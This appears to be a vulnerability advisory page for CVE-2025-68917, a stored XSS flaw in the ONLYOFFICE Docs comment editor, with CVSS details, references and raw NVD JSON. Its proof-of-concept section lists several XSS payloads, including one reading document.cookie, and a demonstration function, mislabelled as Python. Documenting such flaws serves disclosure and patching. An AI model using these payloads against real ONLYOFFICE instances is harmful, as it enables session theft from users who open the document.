CVE-2025-68917

Description

ONLYOFFICE Docs before 9.2.1 allows XSS in the textarea of the comment editing form. This is related to DocumentServer.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ONLYOFFICE Docs DocumentServer < 9.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-68917 XSS PoC for ONLYOFFICE Docs Comment Editing Form
// This PoC demonstrates the stored XSS vulnerability in the comment textarea

// Method 1: Basic script tag injection
const xssPayload1 = '<script>alert(document.domain)</script>';

// Method 2: Event handler injection (img onerror)
const xssPayload2 = '<img src=x onerror=alert(document.cookie)>';

// Method 3: Event handler injection (body onload)
const xssPayload3 = '<body onload=alert("XSS")>';

// Method 4: SVG injection
const xssPayload4 = '<svg onload=alert(document.location)>';

// Function to demonstrate the attack flow
function exploitXSS() {
    // Step 1: Attacker injects malicious comment
    const maliciousComment = {
        action: 'submitComment',
        documentId: 'target_document_id',
        commentText: xssPayload2,
        userId: 'attacker_user_id'
    };
    
    console.log('[+] Attacker injects XSS payload into comment field');
    console.log('[+] Payload:', maliciousComment.commentText);
    
    // Step 2: Payload is stored without proper sanitization
    // In vulnerable version < 9.2.1, the payload is saved as-is
    
    // Step 3: Victim views the document with the malicious comment
    console.log('[+] Victim opens the document');
    console.log('[+] XSS payload executes in victim\'s browser context');
    console.log('[+] Attacker can steal cookies, session tokens, etc.');
    
    return maliciousComment;
}

// Execute exploit demonstration
exploitXSS();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68917
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68917
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68917/
[4] VulDB https://vuldb.com/cve/CVE-2025-68917
[5] https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#921

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68917", "sourceIdentifier": "[email protected]", "published": "2025-12-24T21:16:04.153", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ONLYOFFICE Docs before 9.2.1 allows XSS in the textarea of the comment editing form. This is related to DocumentServer."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/ONLYOFFICE/DocumentServer/blob/master/CHANGELOG.md#921", "source": "[email protected]"}]}}